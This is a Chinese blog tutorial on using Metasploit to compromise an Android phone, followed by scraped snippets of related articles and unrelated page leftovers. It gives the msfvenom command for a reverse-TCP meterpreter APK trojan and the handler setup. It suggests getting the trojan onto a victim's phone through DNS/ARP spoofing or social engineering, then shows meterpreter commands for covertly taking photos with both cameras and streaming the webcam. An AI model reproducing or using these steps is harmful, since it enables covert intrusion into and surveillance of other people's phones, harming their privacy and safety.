MSF入侵安卓手机
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。
我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。
环境:Backbox linux+MSF
目标:一台安卓手机
既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP
本机IP:192.168.1.6
在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径
这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具
输入命令:msfconsole
然后输入:
1. use exploit/multi/handler 加载模块
2. set payload android/meterpreter/reverse_tcp 选择Payload
3.show options 查看参数设置
我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口
3.exploit 开始执行漏洞 开始监听...
OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件
还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试
安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了
我们可以在我们的MSF里看见有一个会话连接了
这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo
webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头
webcam_snap 隐秘拍照功能
后边跟上参数-i 指定使用那个摄像头拍照
可以看见我们分别对前后摄像头都拍了照 保存到了桌面上
还可以输入命令 webcam_stream 开启摄像头
其它的功能还有更多 。暂时就先到这吧。。。
MSF入侵安卓手机的更多相关文章
- Kali环境使用Metasploit生成木马入侵安卓手机
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计, ...
- MSF初体验—入侵安卓手机
1.生成apk程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk ...
- msf渗透安卓手机
正文开始 首先你需要kali系统 生成木马 首先ifconfig查看本机在局域网内的ip 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/rever ...
- Metasploit生成木马入侵安卓手机
开始 首先你需要一个Metasploit(废话) Linux: sudo apt install metasploit-framework Termux: 看这里 指令 sudo su //生成木马文 ...
- 部分安卓手机微信浏览器中使用XMLHttpRequest 2上传图片显示字节数为0的解决办法
前端JS中使用XMLHttpRequest 2上传图片到服务器,PC端和大部分手机上都正常,但在少部分安卓手机上上传失败,服务器上查看图片,显示字节数为0.下面是上传图片的核心代码: HTML < ...
- 安卓手机APP压力monkey测试
一.Monkey概述 Monkey是Android中的一个命令行工具,可以运行在模拟器里或实际设备中.它向系统发送伪随机的用户事件流(如按键输入.触摸屏输入.手势输入等),实现对正在开发的应用程序进行 ...
- PowerShell脚本自动设置安卓手机wifi代理
在实际测试工作中,经常要将安卓手机通过wifi代理的形式连接到本机的fiddler或charles服务器代理进行抓包测试.最近一直在想,有没有什么方法可以自动设置安卓手机的wifi代理,曾经想通过修改 ...
- HTML 判断手机的类型(苹果手机安卓手机)
function isJudege_PlatForm() { var version = navigator.appVersion; var platName = navigator.userAgen ...
- 微信小程序 wx.uploadFile在安卓手机上面the same task is working问题解决
微信小程序上传图片的时候,如果是多图片上传,一般都是直接用一个循环进行wx.uploadFile 这个在电脑上面测试与苹果手机上面都不会有什么问题 但当用安卓测试的时候,你会发现小程序会提示一个the ...
随机推荐
- isnull函数
isnull是判断一个字段是否为空值,返回一个特定的值 列: isnull(a,0) 如果a字段有空值返回0 没有空值就返回a的本身 isnull(a,1)=2 字段a有空值返回1,判断isnull ...
- 一个骚气的前端JS代码生成网站
生成Javascript 颜文字代码 稍微试了试 原本的代码: alert("Hello, JavaScript") 转换后代码 ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`* ...
- openlayers 4快速渲染管网模型数据
1.背景 项目需要将管网模型运行的结果数据在矢量地图上以不同颜色加以区分.结果数据中和图层数据中唯一能对应的只有一个标识. 2.实现思路 利用定时器+图层统一渲染.在style上找到突破口,而不是用常 ...
- Eclipse使用快捷键总结
1.为方法添加注释:Alt + Shift + J
- unity3d之相机跟随人物
一.第三人称视角 _1 先设置好相机与玩家之间的角度 给相机添加代码 using UnityEngine; using System.Collections; namespace CompletePr ...
- javaweb servlet jsp简单笔记
第二章: 1: web 俗称 : 万维网 www 2: web开发 的三大核心: HTML(网页) ,URL(定位),HTTP:(协议) 页面的分类: 静态页面: html+css 动态页面:jsp ...
- Linux基础之-Bash命令优先级
一. Bash简介 命令解释器,也就是 Bourne Again Shell,起源于shell.shell俗称壳,它是指UNIX系统下的一个命令解析器:主要用于用户和系统的交互.UNIX系统上有很多种 ...
- <Android Framework 之路>BootAnimation(2)
前言 上一篇主要讲解了BootAnimation是从何而来,如何启动,从开机,到SurfaceFlinger服务起来,然后到执行开机动画,如果要深入的看里面的代码,是需要花一定的时间的,我们旨在了解大 ...
- 关联函数 map 的基本用法
1.map简介 map是一类关联式容器.它的特点是增加和删除节点对迭代器的影响很小,除了那个操作节点,对其他的节点都没有什么影响.对于迭代器来说,可以修改实值,而不能修改key. 2.map的功能 自 ...
- 一点点学习的心得-MetroJS
原文:http://zhangxiaolun.lofter.com/post/217084_73a1a9# 在最近的一个项目中,页面上有一部分由一些图片方块组成,要求说是:“做成类似动画的东东,最好可 ...